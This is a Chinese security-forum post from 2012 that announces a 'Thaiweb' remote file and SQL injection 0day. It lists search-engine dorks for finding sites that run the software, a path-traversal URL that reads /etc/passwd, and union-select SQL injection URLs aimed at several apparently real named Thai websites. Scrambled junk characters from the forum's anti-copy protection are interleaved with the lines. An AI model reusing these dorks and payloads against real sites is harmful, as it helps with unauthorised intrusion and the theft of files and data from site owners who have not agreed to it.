找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2207|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:
( v/ u+ ~: v  H, j$ `
5 _  }; Y' F4 s4 U5 nintext:powered by Thaiweb2 F( I4 \+ V3 b. h9 H4 N" [
+ m% o2 t$ \  Z/ ~
inurl:index.php?page=board.php) T$ G4 F! `# S6 r$ ^

0 b$ ^! Q! H1 S& k. W7 q6 z % _, T, f, n3 ?5 H/ b/ J

  R9 L+ E1 D  a7 c) Q利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd
  F! _2 o: w+ M, a" q1 h0 ?
+ v/ E1 M# {  m' c' n  x * z9 ~) G! u! a9 P
' |4 b: M% _3 ]1 a7 r
利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'* }9 Z5 `' d" b4 z  G% q1 C9 s

3 P" {7 \4 p9 ]# a4 C- w 5 D! [+ _  V0 y9 c

( }, l0 j& d' f: F5 ?http://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--1 p$ p/ V* p" a( G5 o. i6 A
5 l; M+ s% x8 E2 F
http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--7 x3 d# S, n, E3 ^( A% O
/ D2 A$ r5 j1 r  s& i8 _, {
http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
6 z) j) {& j4 t0 O3 l
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表